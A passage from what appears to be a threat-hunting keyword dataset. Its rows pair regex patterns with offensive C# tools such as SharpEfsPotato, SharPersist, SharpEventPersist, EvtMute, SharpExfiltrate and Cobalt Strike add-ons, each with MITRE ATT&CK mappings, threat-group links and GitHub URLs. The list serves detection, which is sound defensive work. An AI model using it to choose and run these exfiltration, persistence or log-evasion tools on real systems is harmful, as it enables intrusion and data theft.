T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpEDRChecker.exe*",".{0,1000}SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpEDRChecker.exe*",".{0,1000}SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*SharpEDRChecker.Program*",".{0,1000}SharpEDRChecker\.Program.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*SharpEDRChecker/releases*",".{0,1000}SharpEDRChecker\/releases.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*SharpEfsPotato by @bugch3ck*",".{0,1000}SharpEfsPotato\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.cs*",".{0,1000}SharpEfsPotato\.cs.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.exe*",".{0,1000}SharpEfsPotato\.exe.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.sln*",".{0,1000}SharpEfsPotato\.sln.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato-master*",".{0,1000}SharpEfsPotato\-master.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsTriggeEfs.exe*",".{0,1000}SharpEfsTriggeEfs\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharPersist -*",".{0,1000}SharPersist\s\-.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*SharPersist*",".{0,1000}SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventLoader.exe*",".{0,1000}SharpEventLoader\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist.exe*",".{0,1000}SharpEventPersist\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist-main*",".{0,1000}SharpEventPersist\-main.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEvtMute.cs*",".{0,1000}SharpEvtMute\.cs.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpEvtMute.exe*",".{0,1000}SharpEvtMute\.exe.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpEvtMute.pdb*",".{0,1000}SharpEvtMute\.pdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpEvtMute.sln*",".{0,1000}SharpEvtMute\.sln.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpExcelibur*",".{0,1000}SharpExcelibur.{0,1000}","offensive_tool_keyword","cobaltstrike","Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpExcelibur","1","1","N/A","10","10","87","19","2021-07-20T04:56:55Z","2021-07-16T19:48:45Z" "*sharp-exec *",".{0,1000}sharp\-exec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpExec.exe*",".{0,1000}SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpExfiltrate.csproj*",".{0,1000}SharpExfiltrate\.csproj.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate.exe*",".{0,1000}SharpExfiltrate\.exe.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate.sln*",".{0,1000}SharpExfiltrate\.sln.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrateLootCache*",".{0,1000}SharpExfiltrateLootCache.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate-main*",".{0,1000}SharpExfiltrate\-main.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*sharp-fexec *",".{0,1000}sharp\-fexec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpFtpC2*",".{0,1000}SharpFtpC2.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*SharpGen.dll*",".{0,1000}SharpGen\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*sharpgen.enable_cache*",".{0,1000}sharpgen\.enable_cache.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*sharpgen.py*",".{0,1000}sharpgen\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*sharpgen.set_location*",".{0,1000}sharpgen\.set_location.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*SharpGhost.exe*",".{0,1000}SharpGhost\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*SharpGhosting.exe*",".{0,1000}SharpGhosting\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*SharpGhostTask.csproj*",".{0,1000}SharpGhostTask\.csproj.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*SharpGhostTask.exe*",".{0,1000}SharpGhostTask\.exe.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*SharpGhostTask.sln*",".{0,1000}SharpGhostTask\.sln.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*SharpGmailC2-main*",".{0,1000}SharpGmailC2\-main.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 